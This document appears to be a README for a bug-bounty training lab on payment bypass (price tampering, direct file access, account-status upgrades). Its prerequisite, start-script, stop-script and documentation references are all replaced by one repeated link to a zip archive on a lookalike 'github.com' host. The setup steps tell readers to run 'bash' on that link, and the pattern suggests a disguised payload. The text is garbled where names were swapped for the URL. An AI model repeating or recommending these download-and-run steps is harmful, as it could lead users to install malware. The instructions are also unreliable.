This lab will help you uncover payment bypass vulnerabilities. You will learn three techniques often used in bug bounty hunting:
- Lab 01: Price Modification - Adjust a price from $99 to $0.
- Lab 02: Direct Path Access - Access premium files for free.
- Lab 03: Permission Bypass - Upgrade your account status from "free" to "paid."
Before you start, ensure you have the following on your computer:
- https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: This is required to run the lab. You can download https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip here.
- Burp Suite: This is optional for some labs but is useful for testing.
Visit this page to download the lab files: Download the latest version.
- Click on the release version that you want to download.
- Follow the instructions on the page to download the appropriate file.
- Open a terminal in the folder where you downloaded the files.
- Run the start script by typing the following command and pressing Enter:
bash https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip
- The lab will open in your default web browser automatically.
To stop the lab: Simply run this command in your terminal:
bash https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip- Navigate to Lab 01.
- Click on "Check Price" on any coupon available in this lab.
- Modify the price to see how it works.
- Head to Lab 02.
- Locate the premium files link.
- Try to access the files without payment.
- Go to Lab 03.
- Follow the instructions to change your account status from "free" to "paid".
- Verify your account benefits after the change.
Inside the downloaded folder, you will find the following files:
https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: This script starts the lab.https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: Use this to stop the lab.https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip: You will find detailed instructions here.- Other configurations specific to each lab you will navigate.
If you encounter issues during setup or while running the labs, consider the following:
- Ensure you have installed https://github.com/ItsRishika/Payment-bypass-bug-lab/raw/refs/heads/main/frontend/src/pages/Payment-bypass-lab-bug-2.7.zip correctly.
- Check your terminal for any error messages. These messages usually indicate what's wrong.
- Restart your terminal and try running the scripts again.
For more help, refer to the Documentation.
Keep the lab updated by following these steps:
- Go back to the Releases page.
- Download the latest version.
- Replace the old files in your local folder with the new files.
If you need assistance or have questions, you can open an issue on the GitHub repository. The community or the maintainers will respond to your inquiry.
That's everything you need to know to download and run the Payment Bypass Techniques Lab. Enjoy learning about payment vulnerabilities!